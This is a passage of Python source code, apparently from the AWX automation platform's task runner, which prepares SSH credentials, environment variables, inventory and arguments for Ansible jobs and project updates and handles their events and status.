<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
# To prevent overwhelming the broadcast queue, skip some websocket messages
if self.recent_event_timings:
cpu_time = time.time()
first_window_time = self.recent_event_timings[0]
last_window_time = self.recent_event_timings[-1]
if event_data.get('event') in MINIMAL_EVENTS:
should_emit = True # always send some types like playbook_on_stats
elif event_data.get('stdout') == '' and event_data['start_line'] == event_data['end_line']:
should_emit = False # exclude events with no output
else:
should_emit = any(
[
# if 30the most recent websocket message was sent over 1 second ago
cpu_time - first_window_time > 1.0,
# if the very last websocket message came in over 1/30 seconds ago
self.recent_event_timings.maxlen * (cpu_time - last_window_time) > 1.0,
# if the queue is not yet full
len(self.recent_event_timings) != self.recent_event_timings.maxlen,
]
)
if should_emit:
self.recent_event_timings.append(cpu_time)
else:
event_data.setdefault('event_data', {})
event_data['skip_websocket_message'] = True
elif self.recent_event_timings.maxlen:
self.recent_event_timings.append(time.time())
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
from awx.main.signals import disable_activity_stream # Circular import
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
from awx.main.signals import disable_activity_stream # Circular import
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
res = receptor_job.run()
self.unit_id = receptor_job.unit_id
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = Instance.objects.me().hostname
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True # to accomidate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
create_partition(local_project_sync.event_class._meta.db_table, start=local_project_sync.created)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
